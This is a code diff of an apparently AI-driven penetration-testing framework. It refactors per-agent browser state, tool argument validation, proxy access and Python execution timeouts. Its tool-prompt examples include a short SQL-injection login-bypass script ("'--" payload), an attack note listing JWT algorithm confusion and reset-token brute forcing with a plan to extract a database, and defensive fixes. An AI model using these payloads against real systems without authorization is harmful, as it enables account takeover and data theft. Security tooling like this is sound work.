browser = self._get_agent_browser()
if browser is None:
raise ValueError("Browser not launched")
try:
result = self.browser_instance.back(tab_id)
result = browser.back(tab_id)
result["message"] = "Navigated back"
except (OSError, ValueError, RuntimeError) as e:
raise RuntimeError(f"Failed to go back: {e}") from e
@@ -97,12 +110,12 @@ class BrowserTabManager:
return result
def forward(self, tab_id: str | None = None) -> dict[str, Any]:
with self._lock:
if self.browser_instance is None:
raise ValueError("Browser not launched")
browser = self._get_agent_browser()
if browser is None:
raise ValueError("Browser not launched")
try:
result = self.browser_instance.forward(tab_id)
result = browser.forward(tab_id)
result["message"] = "Navigated forward"
except (OSError, ValueError, RuntimeError) as e:
raise RuntimeError(f"Failed to go forward: {e}") from e
@@ -110,12 +123,12 @@ class BrowserTabManager:
return result
def new_tab(self, url: str | None = None) -> dict[str, Any]:
with self._lock:
if self.browser_instance is None:
raise ValueError("Browser not launched")
browser = self._get_agent_browser()
if browser is None:
raise ValueError("Browser not launched")
try:
result = self.browser_instance.new_tab(url)
result = browser.new_tab(url)
result["message"] = f"Created new tab {result.get('tab_id', '')}"
except (OSError, ValueError, RuntimeError) as e:
raise RuntimeError(f"Failed to create new tab: {e}") from e
@@ -123,12 +136,12 @@ class BrowserTabManager:
return result
def switch_tab(self, tab_id: str) -> dict[str, Any]:
with self._lock:
if self.browser_instance is None:
raise ValueError("Browser not launched")
browser = self._get_agent_browser()
if browser is None:
raise ValueError("Browser not launched")
try:
result = self.browser_instance.switch_tab(tab_id)
result = browser.switch_tab(tab_id)
result["message"] = f"Switched to tab {tab_id}"
except (OSError, ValueError, RuntimeError) as e:
raise RuntimeError(f"Failed to switch tab: {e}") from e
@@ -136,12 +149,12 @@ class BrowserTabManager:
return result
def close_tab(self, tab_id: str) -> dict[str, Any]:
with self._lock:
if self.browser_instance is None:
raise ValueError("Browser not launched")
browser = self._get_agent_browser()
if browser is None:
raise ValueError("Browser not launched")
try:
result = self.browser_instance.close_tab(tab_id)
result = browser.close_tab(tab_id)
result["message"] = f"Closed tab {tab_id}"
except (OSError, ValueError, RuntimeError) as e:
raise RuntimeError(f"Failed to close tab: {e}") from e
@@ -149,12 +162,12 @@ class BrowserTabManager:
return result
def wait_browser(self, duration: float, tab_id: str | None = None) -> dict[str, Any]:
with self._lock:
if self.browser_instance is None:
raise ValueError("Browser not launched")
browser = self._get_agent_browser()
if browser is None:
raise ValueError("Browser not launched")
try:
result = self.browser_instance.wait(duration, tab_id)
result = browser.wait(duration, tab_id)
result["message"] = f"Waited {duration}s"
except (OSError, ValueError, RuntimeError) as e:
raise RuntimeError(f"Failed to wait: {e}") from e
@@ -162,12 +175,12 @@ class BrowserTabManager:
return result
def execute_js(self, js_code: str, tab_id: str | None = None) -> dict[str, Any]:
with self._lock:
if self.browser_instance is None:
raise ValueError("Browser not launched")
browser = self._get_agent_browser()
if browser is None:
raise ValueError("Browser not launched")
try:
result = self.browser_instance.execute_js(js_code, tab_id)
result = browser.execute_js(js_code, tab_id)
result["message"] = "JavaScript executed successfully"
except (OSError, ValueError, RuntimeError) as e:
raise RuntimeError(f"Failed to execute JavaScript: {e}") from e
@@ -175,12 +188,12 @@ class BrowserTabManager:
return result
def double_click(self, coordinate: str, tab_id: str | None = None) -> dict[str, Any]:
with self._lock:
if self.browser_instance is None:
raise ValueError("Browser not launched")
browser = self._get_agent_browser()
if browser is None:
raise ValueError("Browser not launched")
try:
result = self.browser_instance.double_click(coordinate, tab_id)
result = browser.double_click(coordinate, tab_id)
result["message"] = f"Double clicked at {coordinate}"
except (OSError, ValueError, RuntimeError) as e:
raise RuntimeError(f"Failed to double click: {e}") from e
@@ -188,12 +201,12 @@ class BrowserTabManager:
return result
def hover(self, coordinate: str, tab_id: str | None = None) -> dict[str, Any]:
with self._lock:
if self.browser_instance is None:
raise ValueError("Browser not launched")
browser = self._get_agent_browser()
if browser is None:
raise ValueError("Browser not launched")
try:
result = self.browser_instance.hover(coordinate, tab_id)
result = browser.hover(coordinate, tab_id)
result["message"] = f"Hovered at {coordinate}"
except (OSError, ValueError, RuntimeError) as e:
raise RuntimeError(f"Failed to hover: {e}") from e
@@ -201,12 +214,12 @@ class BrowserTabManager:
return result
def press_key(self, key: str, tab_id: str | None = None) -> dict[str, Any]:
with self._lock:
if self.browser_instance is None:
raise ValueError("Browser not launched")
browser = self._get_agent_browser()
if browser is None:
raise ValueError("Browser not launched")
try:
result = self.browser_instance.press_key(key, tab_id)
result = browser.press_key(key, tab_id)
result["message"] = f"Pressed key {key}"
except (OSError, ValueError, RuntimeError) as e:
raise RuntimeError(f"Failed to press key: {e}") from e
@@ -214,12 +227,12 @@ class BrowserTabManager:
return result
def save_pdf(self, file_path: str, tab_id: str | None = None) -> dict[str, Any]:
with self._lock:
if self.browser_instance is None:
raise ValueError("Browser not launched")
browser = self._get_agent_browser()
if browser is None:
raise ValueError("Browser not launched")
try:
result = self.browser_instance.save_pdf(file_path, tab_id)
result = browser.save_pdf(file_path, tab_id)
result["message"] = f"Page saved as PDF: {file_path}"
except (OSError, ValueError, RuntimeError) as e:
raise RuntimeError(f"Failed to save PDF: {e}") from e
@@ -227,12 +240,12 @@ class BrowserTabManager:
return result
def get_console_logs(self, tab_id: str | None = None, clear: bool = False) -> dict[str, Any]:
with self._lock:
if self.browser_instance is None:
raise ValueError("Browser not launched")
browser = self._get_agent_browser()
if browser is None:
raise ValueError("Browser not launched")
try:
result = self.browser_instance.get_console_logs(tab_id, clear)
result = browser.get_console_logs(tab_id, clear)
action_text = "cleared and retrieved" if clear else "retrieved"
logs = result.get("console_logs", [])
@@ -249,12 +262,12 @@ class BrowserTabManager:
return result
def view_source(self, tab_id: str | None = None) -> dict[str, Any]:
with self._lock:
if self.browser_instance is None:
raise ValueError("Browser not launched")
browser = self._get_agent_browser()
if browser is None:
raise ValueError("Browser not launched")
try:
result = self.browser_instance.view_source(tab_id)
result = browser.view_source(tab_id)
result["message"] = "Page source retrieved"
except (OSError, ValueError, RuntimeError) as e:
raise RuntimeError(f"Failed to get page source: {e}") from e
@@ -262,18 +275,18 @@ class BrowserTabManager:
return result
def list_tabs(self) -> dict[str, Any]:
with self._lock:
if self.browser_instance is None:
return {"tabs": {}, "total_count": 0, "current_tab": None}
browser = self._get_agent_browser()
if browser is None:
return {"tabs": {}, "total_count": 0, "current_tab": None}
try:
tab_info = {}
for tid, tab_page in self.browser_instance.pages.items():
for tid, tab_page in browser.pages.items():
try:
tab_info[tid] = {
"url": tab_page.url,
"title": "Unknown" if tab_page.is_closed() else "Active",
"is_current": tid == self.browser_instance.current_page_id,
"is_current": tid == browser.current_page_id,
}
except (AttributeError, RuntimeError):
tab_info[tid] = {
@@ -285,19 +298,20 @@ class BrowserTabManager:
return {
"tabs": tab_info,
"total_count": len(tab_info),
"current_tab": self.browser_instance.current_page_id,
"current_tab": browser.current_page_id,
}
except (OSError, ValueError, RuntimeError) as e:
raise RuntimeError(f"Failed to list tabs: {e}") from e
def close_browser(self) -> dict[str, Any]:
agent_id = get_current_agent_id()
with self._lock:
if self.browser_instance is None:
browser = self._browsers_by_agent.pop(agent_id, None)
if browser is None:
raise ValueError("Browser not launched")
try:
self.browser_instance.close()
self.browser_instance = None
browser.close()
except (OSError, ValueError, RuntimeError) as e:
raise RuntimeError(f"Failed to close browser: {e}") from e
else:
@@ -307,33 +321,38 @@ class BrowserTabManager:
"is_running": False,
}
def cleanup_agent(self, agent_id: str) -> None:
with self._lock:
browser = self._browsers_by_agent.pop(agent_id, None)
if browser:
with contextlib.suppress(Exception):
browser.close()
def cleanup_dead_browser(self) -> None:
with self._lock:
if self.browser_instance and not self.browser_instance.is_alive():
dead_agents = []
for agent_id, browser in self._browsers_by_agent.items():
if not browser.is_alive():
dead_agents.append(agent_id)
for agent_id in dead_agents:
browser = self._browsers_by_agent.pop(agent_id)
with contextlib.suppress(Exception):
self.browser_instance.close()
self.browser_instance = None
browser.close()
def close_all(self) -> None:
with self._lock:
if self.browser_instance:
with contextlib.suppress(Exception):
self.browser_instance.close()
self.browser_instance = None
browsers = list(self._browsers_by_agent.values())
self._browsers_by_agent.clear()
for browser in browsers:
with contextlib.suppress(Exception):
browser.close()
def _register_cleanup_handlers(self) -> None:
atexit.register(self.close_all)
signal.signal(signal.SIGTERM, self._signal_handler)
signal.signal(signal.SIGINT, self._signal_handler)
if hasattr(signal, "SIGHUP"):
signal.signal(signal.SIGHUP, self._signal_handler)
def _signal_handler(self, _signum: int, _frame: Any) -> None:
self.close_all()
sys.exit(0)
_browser_tab_manager = BrowserTabManager()

strix/tools/context.py Normal file

@@ -0,0 +1,12 @@
from contextvars import ContextVar
current_agent_id: ContextVar[str] = ContextVar("current_agent_id", default="default")
def get_current_agent_id() -> str:
return current_agent_id.get()
def set_current_agent_id(agent_id: str) -> None:
current_agent_id.set(agent_id)
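`ContextVar` gives each asyncio task its own copy of the value, which is what makes per-agent isolation work with one task per agent: concurrent `set()` calls in different tasks never clobber each other. A self-contained demonstration:

```python
import asyncio
from contextvars import ContextVar

current_agent_id: ContextVar[str] = ContextVar("current_agent_id", default="default")


async def handle(agent_id: str) -> str:
    # each task spawned by gather() runs in its own copy of the context,
    # so this set() is invisible to the sibling task
    current_agent_id.set(agent_id)
    await asyncio.sleep(0)  # yield so the tasks interleave
    return current_agent_id.get()


async def main() -> list[str]:
    return list(await asyncio.gather(*(handle(a) for a in ("agent-1", "agent-2"))))
```

Managers like `BrowserTabManager` can then call `get_current_agent_id()` anywhere below the task entry point without threading an `agent_id` parameter through every signature.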


@@ -5,6 +5,7 @@ from typing import Any
import httpx
from strix.config import Config
from strix.telemetry import posthog
if os.getenv("STRIX_SANDBOX_MODE", "false").lower() == "false":
@@ -14,12 +15,14 @@ from .argument_parser import convert_arguments
from .registry import (
get_tool_by_name,
get_tool_names,
get_tool_param_schema,
needs_agent_state,
should_execute_in_sandbox,
)
SANDBOX_EXECUTION_TIMEOUT = float(Config.get("strix_sandbox_execution_timeout") or "500")
_SERVER_TIMEOUT = float(Config.get("strix_sandbox_execution_timeout") or "120")
SANDBOX_EXECUTION_TIMEOUT = _SERVER_TIMEOUT + 30
SANDBOX_CONNECT_TIMEOUT = float(Config.get("strix_sandbox_connect_timeout") or "10")
@@ -81,14 +84,18 @@ async def _execute_tool_in_sandbox(tool_name: str, agent_state: Any, **kwargs: A
response.raise_for_status()
response_data = response.json()
if response_data.get("error"):
posthog.error("tool_execution_error", f"{tool_name}: {response_data['error']}")
raise RuntimeError(f"Sandbox execution error: {response_data['error']}")
return response_data.get("result")
except httpx.HTTPStatusError as e:
posthog.error("tool_http_error", f"{tool_name}: HTTP {e.response.status_code}")
if e.response.status_code == 401:
raise RuntimeError("Authentication failed: Invalid or missing sandbox token") from e
raise RuntimeError(f"HTTP error calling tool server: {e.response.status_code}") from e
except httpx.RequestError as e:
raise RuntimeError(f"Request error calling tool server: {e}") from e
error_type = type(e).__name__
posthog.error("tool_request_error", f"{tool_name}: {error_type}")
raise RuntimeError(f"Request error calling tool server: {error_type}") from e
async def _execute_tool_locally(tool_name: str, agent_state: Any | None, **kwargs: Any) -> Any:
@@ -110,14 +117,51 @@ async def _execute_tool_locally(tool_name: str, agent_state: Any | None, **kwarg
def validate_tool_availability(tool_name: str | None) -> tuple[bool, str]:
if tool_name is None:
return False, "Tool name is missing"
available = ", ".join(sorted(get_tool_names()))
return False, f"Tool name is missing. Available tools: {available}"
if tool_name not in get_tool_names():
return False, f"Tool '{tool_name}' is not available"
available = ", ".join(sorted(get_tool_names()))
return False, f"Tool '{tool_name}' is not available. Available tools: {available}"
return True, ""
def _validate_tool_arguments(tool_name: str, kwargs: dict[str, Any]) -> str | None:
param_schema = get_tool_param_schema(tool_name)
if not param_schema or not param_schema.get("has_params"):
return None
allowed_params: set[str] = param_schema.get("params", set())
required_params: set[str] = param_schema.get("required", set())
optional_params = allowed_params - required_params
schema_hint = _format_schema_hint(tool_name, required_params, optional_params)
unknown_params = set(kwargs.keys()) - allowed_params
if unknown_params:
unknown_list = ", ".join(sorted(unknown_params))
return f"Tool '{tool_name}' received unknown parameter(s): {unknown_list}\n{schema_hint}"
missing_required = [
param for param in required_params if param not in kwargs or kwargs.get(param) in (None, "")
]
if missing_required:
missing_list = ", ".join(sorted(missing_required))
return f"Tool '{tool_name}' missing required parameter(s): {missing_list}\n{schema_hint}"
return None
def _format_schema_hint(tool_name: str, required: set[str], optional: set[str]) -> str:
parts = [f"Valid parameters for '{tool_name}':"]
if required:
parts.append(f" Required: {', '.join(sorted(required))}")
if optional:
parts.append(f" Optional: {', '.join(sorted(optional))}")
return "\n".join(parts)
async def execute_tool_with_validation(
tool_name: str | None, agent_state: Any | None = None, **kwargs: Any
) -> Any:
@@ -127,6 +171,10 @@ async def execute_tool_with_validation(
assert tool_name is not None
arg_error = _validate_tool_arguments(tool_name, kwargs)
if arg_error:
return f"Error: {arg_error}"
try:
result = await execute_tool(tool_name, agent_state, **kwargs)
except Exception as e: # noqa: BLE001


@@ -104,8 +104,30 @@
# Create a file
<function=str_replace_editor>
<parameter=command>create</parameter>
<parameter=path>/home/user/project/new_file.py</parameter>
<parameter=file_text>print("Hello World")</parameter>
<parameter=path>/home/user/project/exploit.py</parameter>
<parameter=file_text>#!/usr/bin/env python3
"""SQL Injection exploit for Acme Corp login endpoint."""
import requests
import sys
TARGET = "https://app.acme-corp.com/api/v1/auth/login"
def exploit(username: str) -> dict:
payload = {
"username": f"{username}'--",
"password": "anything"
}
response = requests.post(TARGET, json=payload, timeout=10)
return response.json()
if __name__ == "__main__":
if len(sys.argv) < 2:
print(f"Usage: {sys.argv[0]} <username>")
sys.exit(1)
result = exploit(sys.argv[1])
print(f"Result: {result}")</parameter>
</function>
# Replace text in file
@@ -121,7 +143,27 @@
<parameter=command>insert</parameter>
<parameter=path>/home/user/project/file.py</parameter>
<parameter=insert_line>10</parameter>
<parameter=new_str>print("Inserted line")</parameter>
<parameter=new_str>def validate_input(user_input: str) -> bool:
"""Validate user input to prevent injection attacks."""
forbidden_chars = ["'", '"', ";", "--", "/*", "*/"]
for char in forbidden_chars:
if char in user_input:
return False
return True</parameter>
</function>
# Replace code block
<function=str_replace_editor>
<parameter=command>str_replace</parameter>
<parameter=path>/home/user/project/auth.py</parameter>
<parameter=old_str>def authenticate(username, password):
query = f"SELECT * FROM users WHERE username = '{username}'"
result = db.execute(query)
return result</parameter>
<parameter=new_str>def authenticate(username, password):
query = "SELECT * FROM users WHERE username = %s"
result = db.execute(query, (username,))
return result</parameter>
</function>
</examples>
</tool>


@@ -66,5 +66,87 @@ Professional, customer-facing penetration test report rules (PDF-ready):
<returns type="Dict[str, Any]">
<description>Response containing success status, vulnerability count, and completion message. If agents are still running, returns details about active agents and suggested actions.</description>
</returns>
<examples>
<function=finish_scan>
<parameter=executive_summary>Executive summary
An external penetration test of the Acme Customer Portal and associated API identified multiple security weaknesses that, if exploited, could result in unauthorized access to customer data, cross-tenant exposure, and access to internal network resources.
Overall risk posture: Elevated.
Key outcomes
- Confirmed server-side request forgery (SSRF) in a URL preview capability that enables the application to initiate outbound requests to attacker-controlled destinations and internal network ranges.
- Identified broken access control patterns in business-critical workflows that can enable cross-tenant data access (tenant isolation failures).
- Observed session and authorization hardening gaps that materially increase risk when combined with other weaknesses.
Business impact
- Increased likelihood of sensitive data exposure across customers/tenants, including invoices, orders, and account information.
- Increased risk of internal service exposure through server-side outbound request functionality (including link-local and private network destinations).
- Increased potential for account compromise and administrative abuse if tokens are stolen or misused.
Remediation theme
Prioritize eliminating SSRF pathways and centralizing authorization enforcement (deny-by-default). Follow with session hardening and monitoring improvements, then validate with a focused retest.</parameter>
<parameter=methodology>Methodology
The assessment followed industry-standard penetration testing practices aligned to OWASP Web Security Testing Guide (WSTG) concepts and common web/API security testing methodology.
Engagement details
- Assessment type: External penetration test (black-box with limited gray-box context)
- Target environment: Production-equivalent staging
Scope (in-scope assets)
- Web application: https://app.acme-corp.com
- API base: https://app.acme-corp.com/api/v1/
High-level testing activities
- Reconnaissance and attack-surface mapping (routes, parameters, workflows)
- Authentication and session management review (token handling, session lifetime, sensitive actions)
- Authorization and tenant-isolation testing (object access and privilege boundaries)
- Input handling and server-side request testing (URL fetchers, imports, previews, callbacks)
- File handling and content rendering review (uploads, previews, unsafe content types)
- Configuration review (transport security, security headers, caching behavior, error handling)
Evidence handling and validation standard
Only validated issues with reproducible impact were treated as findings. Each finding was documented with clear reproduction steps and sufficient evidence to support remediation and verification testing.</parameter>
<parameter=technical_analysis>Technical analysis
This section provides a consolidated view of the confirmed findings and observed risk patterns. Detailed reproduction steps and evidence are documented in the individual vulnerability reports.
Severity model
Severity reflects a combination of exploitability and potential impact to confidentiality, integrity, and availability, considering realistic attacker capabilities.
Confirmed findings (high level)
1) Server-side request forgery (SSRF) in URL preview (Critical)
The application fetches user-supplied URLs server-side to generate previews. Validation controls were insufficient to prevent access to internal and link-local destinations. This creates a pathway to internal network enumeration and potential access to sensitive internal services. Redirect and DNS/normalization bypass risk must be assumed unless controls are comprehensive and applied on every request hop.
2) Broken tenant isolation in order/invoice workflows (High)
Multiple endpoints accepted object identifiers without consistently enforcing tenant ownership. This is indicative of broken function- and object-level authorization checks. In practice, this can enable cross-tenant access to business-critical resources (viewing or modifying data outside the attacker's tenant boundary).
3) Administrative action hardening gaps (Medium)
Several sensitive actions lacked defense-in-depth controls (e.g., re-authentication for high-risk actions, consistent authorization checks across related endpoints, and protections against session misuse). While not all behaviors were immediately exploitable in isolation, they increase the likelihood and blast radius of account compromise when chained with other vulnerabilities.
4) Unsafe file preview/content handling patterns (Medium)
File preview and rendering behaviors can create exposure to script execution or content-type confusion if unsafe formats are rendered inline. Controls should be consistent: strong content-type validation, forced download where appropriate, and hardening against active content.
Systemic themes and root causes
- Authorization enforcement appears distributed and inconsistent across endpoints instead of centralized and testable.
- Outbound request functionality lacks a robust, deny-by-default policy for destination validation.
- Hardening controls (session lifetime, sensitive-action controls, logging) are applied unevenly, increasing the likelihood of successful attack chains.</parameter>
<parameter=recommendations>Recommendations
Priority 0
- Eliminate SSRF by implementing a strict destination allowlist and deny-by-default policy for outbound requests. Block private, loopback, and link-local ranges (IPv4 and IPv6) after DNS resolution. Re-validate on every redirect hop. Apply URL parsing/normalization safeguards against ambiguous encodings and unusual IP notations.
- Apply network egress controls so the application runtime cannot reach sensitive internal ranges or link-local services. Route necessary outbound requests through a policy-enforcing egress proxy with logging.
Priority 1
- Centralize authorization enforcement for all object access and administrative actions. Implement consistent tenant-ownership checks for every read/write path involving orders, invoices, and account resources. Adopt deny-by-default authorization middleware/policies.
- Add regression tests for authorization decisions, including cross-tenant negative cases and privilege-boundary testing for administrative endpoints.
- Harden session management: secure cookie attributes, session rotation after authentication and privilege change events, reduced session lifetime for privileged contexts, and consistent CSRF protections for state-changing actions.
Priority 2
- Harden file handling and preview behaviors: strict content-type allowlists, forced download for active formats, safe rendering pipelines, and scanning/sanitization where applicable.
- Improve monitoring and detection: alert on high-risk events such as repeated authorization failures, anomalous outbound fetch attempts, sensitive administrative actions, and unusual access patterns to business-critical resources.
Follow-up validation
- Conduct a targeted retest after remediation to confirm SSRF controls, tenant isolation enforcement, and session hardening, and to ensure no bypasses exist via redirects, DNS rebinding, or encoding edge cases.</parameter>
</function>
</examples>
</tool>
</tools>


@@ -24,29 +24,54 @@
<examples>
# Document an interesting finding
<function=create_note>
<parameter=title>Interesting Directory Found</parameter>
<parameter=content>Found /backup/ directory that might contain sensitive files. Directory listing
seems disabled but worth investigating further.</parameter>
<parameter=title>Authentication Bypass Findings</parameter>
<parameter=content>Discovered multiple authentication bypass vectors in the login system:
1. SQL Injection in username field
- Payload: admin'--
- Result: Full authentication bypass
- Endpoint: POST /api/v1/auth/login
2. JWT Token Weakness
- Algorithm confusion attack possible (RS256 -> HS256)
- Token expiration is 24 hours but no refresh rotation
- Token stored in localStorage (XSS risk)
3. Password Reset Flow
- Reset tokens are only 6 digits (brute-forceable)
- No rate limiting on reset attempts
- Token valid for 48 hours
Next Steps:
- Extract full database via SQL injection
- Test JWT manipulation attacks
- Attempt password reset brute force</parameter>
<parameter=category>findings</parameter>
<parameter=tags>["directory", "backup"]</parameter>
<parameter=tags>["auth", "sqli", "jwt", "critical"]</parameter>
</function>
# Methodology note
<function=create_note>
<parameter=title>Authentication Flow Analysis</parameter>
<parameter=content>The application uses JWT tokens stored in localStorage. Token expiration is
set to 24 hours. Observed that refresh token rotation is not implemented.</parameter>
<parameter=category>methodology</parameter>
<parameter=tags>["auth", "jwt", "session"]</parameter>
</function>
# Research question
<function=create_note>
<parameter=title>Custom Header Investigation</parameter>
<parameter=content>The API returns a custom X-Request-ID header. Need to research if this
could be used for user tracking or has any security implications.</parameter>
<parameter=category>questions</parameter>
<parameter=tags>["headers", "research"]</parameter>
</function>
# Comprehensive methodology note
<function=create_note>
<parameter=title>API Endpoint Mapping Complete</parameter>
<parameter=content>Completed comprehensive API enumeration using multiple techniques:
Discovered Endpoints:
- /api/v1/auth/* - Authentication endpoints (login, register, reset)
- /api/v1/users/* - User management (profile, settings, admin)
- /api/v1/orders/* - Order management (IDOR vulnerability confirmed)
- /api/v1/admin/* - Admin panel (403 but may be bypassable)
- /api/internal/* - Internal APIs (should not be exposed)
Methods Used:
- Analyzed JavaScript bundles for API calls
- Bruteforced common paths with ffuf
- Reviewed OpenAPI/Swagger documentation at /api/docs
- Monitored traffic during normal application usage
Priority Targets:
The /api/internal/* endpoints are high priority as they appear to lack authentication checks based on error message differences.</parameter>
<parameter=category>methodology</parameter>
<parameter=tags>["api", "enumeration", "recon"]</parameter>
</function>
</examples>
</tool>

View File

@@ -1,4 +1,3 @@
<?xml version="1.0" ?>
<tools>
<tool name="list_requests">
<description>List and filter proxy requests using HTTPQL with pagination.</description>

View File

@@ -16,17 +16,24 @@ if TYPE_CHECKING:
from collections.abc import Callable
CAIDO_PORT = 48080 # Fixed port inside container
class ProxyManager:
def __init__(self, auth_token: str | None = None):
host = "127.0.0.1"
port = os.getenv("CAIDO_PORT", "56789")
self.base_url = f"http://{host}:{port}/graphql"
self.proxies = {"http": f"http://{host}:{port}", "https": f"http://{host}:{port}"}
self.base_url = f"http://{host}:{CAIDO_PORT}/graphql"
self.proxies = {
"http": f"http://{host}:{CAIDO_PORT}",
"https": f"http://{host}:{CAIDO_PORT}",
}
self.auth_token = auth_token or os.getenv("CAIDO_API_TOKEN")
self.transport = RequestsHTTPTransport(
def _get_client(self) -> Client:
transport = RequestsHTTPTransport(
url=self.base_url, headers={"Authorization": f"Bearer {self.auth_token}"}
)
self.client = Client(transport=self.transport, fetch_schema_from_transport=False)
return Client(transport=transport, fetch_schema_from_transport=False)
def list_requests(
self,
@@ -85,7 +92,7 @@ class ProxyManager:
}
try:
result = self.client.execute(query, variable_values=variables)
result = self._get_client().execute(query, variable_values=variables)
data = result.get("requestsByOffset", {})
nodes = [edge["node"] for edge in data.get("edges", [])]
@@ -132,7 +139,9 @@ class ProxyManager:
return {"error": f"Invalid part '{part}'. Use 'request' or 'response'"}
try:
result = self.client.execute(gql(queries[part]), variable_values={"id": request_id})
result = self._get_client().execute(
gql(queries[part]), variable_values={"id": request_id}
)
request_data = result.get("request", {})
if not request_data:
@@ -430,7 +439,9 @@ class ProxyManager:
}
def _handle_scope_list(self) -> dict[str, Any]:
result = self.client.execute(gql("query { scopes { id name allowlist denylist indexed } }"))
result = self._get_client().execute(
gql("query { scopes { id name allowlist denylist indexed } }")
)
scopes = result.get("scopes", [])
return {"scopes": scopes, "count": len(scopes)}
@@ -438,7 +449,7 @@ class ProxyManager:
if not scope_id:
return self._handle_scope_list()
result = self.client.execute(
result = self._get_client().execute(
gql(
"query GetScope($id: ID!) { scope(id: $id) { id name allowlist denylist indexed } }"
),
@@ -467,7 +478,7 @@ class ProxyManager:
}
""")
result = self.client.execute(
result = self._get_client().execute(
mutation,
variable_values={
"input": {
@@ -507,7 +518,7 @@ class ProxyManager:
}
""")
result = self.client.execute(
result = self._get_client().execute(
mutation,
variable_values={
"id": scope_id,
@@ -530,7 +541,7 @@ class ProxyManager:
if not scope_id:
return {"error": "scope_id required for delete"}
result = self.client.execute(
result = self._get_client().execute(
gql("mutation DeleteScope($id: ID!) { deleteScope(id: $id) { deletedId } }"),
variable_values={"id": scope_id},
)
@@ -607,7 +618,7 @@ class ProxyManager:
}
}
""")
result = self.client.execute(
result = self._get_client().execute(
query, variable_values={"parentId": parent_id, "depth": depth}
)
data = result.get("sitemapDescendantEntries", {})
@@ -624,7 +635,7 @@ class ProxyManager:
}
}
""")
result = self.client.execute(query, variable_values={"scopeId": scope_id})
result = self._get_client().execute(query, variable_values={"scopeId": scope_id})
data = result.get("sitemapRootEntries", {})
all_nodes = [edge["node"] for edge in data.get("edges", [])]
@@ -731,7 +742,7 @@ class ProxyManager:
}
""")
result = self.client.execute(query, variable_values={"id": entry_id})
result = self._get_client().execute(query, variable_values={"id": entry_id})
entry = result.get("sitemapEntry")
if not entry:
@@ -780,6 +791,7 @@ _PROXY_MANAGER: ProxyManager | None = None
def get_proxy_manager() -> ProxyManager:
global _PROXY_MANAGER # noqa: PLW0603
if _PROXY_MANAGER is None:
return ProxyManager()
_PROXY_MANAGER = ProxyManager()
return _PROXY_MANAGER

View File

@@ -1,4 +1,3 @@
<?xml version="1.0" encoding="UTF-8"?>
<tools>
<tool name="python_action">
<description>Perform Python actions using persistent interpreter sessions for cybersecurity tasks.</description>
@@ -55,6 +54,7 @@
- Print statements and stdout are captured
- Variables persist between executions in the same session
- Imports, function definitions, etc. persist in the session
- IMPORTANT (multiline): Put real line breaks in your code. Do NOT emit literal "\n" sequences — use actual newlines.
- IPython magic commands are fully supported (%pip, %time, %whos, %%writefile, etc.)
- Line magics (%) and cell magics (%%) work as expected
6. CLOSE: Terminates the session completely and frees memory
@@ -73,6 +73,14 @@
print("Security analysis session started")</parameter>
</function>
<function=python_action>
<parameter=action>execute</parameter>
<parameter=code>import requests
url = "https://example.com"
resp = requests.get(url, timeout=10)
print(resp.status_code)</parameter>
</function>
# Analyze security data in the default session
<function=python_action>
<parameter=action>execute</parameter>

View File

@@ -1,5 +1,4 @@
import io
import signal
import sys
import threading
from typing import Any
@@ -57,28 +56,6 @@ class PythonInstance:
}
return None
def _setup_execution_environment(self, timeout: int) -> tuple[Any, io.StringIO, io.StringIO]:
stdout_capture = io.StringIO()
stderr_capture = io.StringIO()
def timeout_handler(signum: int, frame: Any) -> None:
raise TimeoutError(f"Code execution timed out after {timeout} seconds")
old_handler = signal.signal(signal.SIGALRM, timeout_handler)
signal.alarm(timeout)
sys.stdout = stdout_capture
sys.stderr = stderr_capture
return old_handler, stdout_capture, stderr_capture
def _cleanup_execution_environment(
self, old_handler: Any, old_stdout: Any, old_stderr: Any
) -> None:
signal.signal(signal.SIGALRM, old_handler)
sys.stdout = old_stdout
sys.stderr = old_stderr
def _truncate_output(self, content: str, max_length: int, suffix: str) -> str:
if len(content) > max_length:
return content[:max_length] + suffix
@@ -142,27 +119,52 @@ class PythonInstance:
return session_error
with self._execution_lock:
result_container: dict[str, Any] = {}
stdout_capture = io.StringIO()
stderr_capture = io.StringIO()
cancelled = threading.Event()
old_stdout, old_stderr = sys.stdout, sys.stderr
try:
old_handler, stdout_capture, stderr_capture = self._setup_execution_environment(
timeout
def _run_code() -> None:
try:
sys.stdout = stdout_capture
sys.stderr = stderr_capture
execution_result = self.shell.run_cell(code, silent=False, store_history=True)
result_container["execution_result"] = execution_result
result_container["stdout"] = stdout_capture.getvalue()
result_container["stderr"] = stderr_capture.getvalue()
except (KeyboardInterrupt, SystemExit) as e:
result_container["error"] = e
except Exception as e: # noqa: BLE001
result_container["error"] = e
finally:
if not cancelled.is_set():
sys.stdout = old_stdout
sys.stderr = old_stderr
exec_thread = threading.Thread(target=_run_code, daemon=True)
exec_thread.start()
exec_thread.join(timeout=timeout)
if exec_thread.is_alive():
cancelled.set()
sys.stdout, sys.stderr = old_stdout, old_stderr
return self._handle_execution_error(
TimeoutError(f"Code execution timed out after {timeout} seconds")
)
try:
execution_result = self.shell.run_cell(code, silent=False, store_history=True)
signal.alarm(0)
if "error" in result_container:
return self._handle_execution_error(result_container["error"])
return self._format_execution_result(
execution_result, stdout_capture.getvalue(), stderr_capture.getvalue()
)
if "execution_result" in result_container:
return self._format_execution_result(
result_container["execution_result"],
result_container.get("stdout", ""),
result_container.get("stderr", ""),
)
except (TimeoutError, KeyboardInterrupt, SystemExit) as e:
signal.alarm(0)
return self._handle_execution_error(e)
finally:
self._cleanup_execution_environment(old_handler, old_stdout, old_stderr)
return self._handle_execution_error(RuntimeError("Unknown execution error"))
def close(self) -> None:
self.is_running = False
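The rewrite above replaces the SIGALRM-based timeout with a worker thread joined for at most `timeout` seconds, so execution can be bounded even off the main thread (SIGALRM only works in the main thread of the main interpreter). A minimal sketch of that pattern, with plain `exec` standing in for IPython's `run_cell`; names are illustrative:

```python
import threading
from typing import Any


def run_with_timeout(code: str, timeout: float) -> dict[str, Any]:
    """Run `code` in a daemon thread; report a timeout if it doesn't finish."""
    result: dict[str, Any] = {}

    def _worker() -> None:
        try:
            namespace: dict[str, Any] = {}
            exec(code, namespace)  # noqa: S102 - illustrative only
            result["ok"] = True
        except Exception as e:  # noqa: BLE001
            result["error"] = repr(e)

    t = threading.Thread(target=_worker, daemon=True)
    t.start()
    t.join(timeout=timeout)
    if t.is_alive():
        # The daemon thread keeps running in the background; the caller
        # just stops waiting, mirroring the cancelled-Event handling above.
        return {"error": f"Code execution timed out after {timeout} seconds"}
    return result
```

The trade-off, visible in the diff as well, is that a timed-out thread cannot be forcibly killed, only abandoned.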

View File

@@ -1,33 +1,41 @@
import atexit
import contextlib
import signal
import sys
import threading
from typing import Any
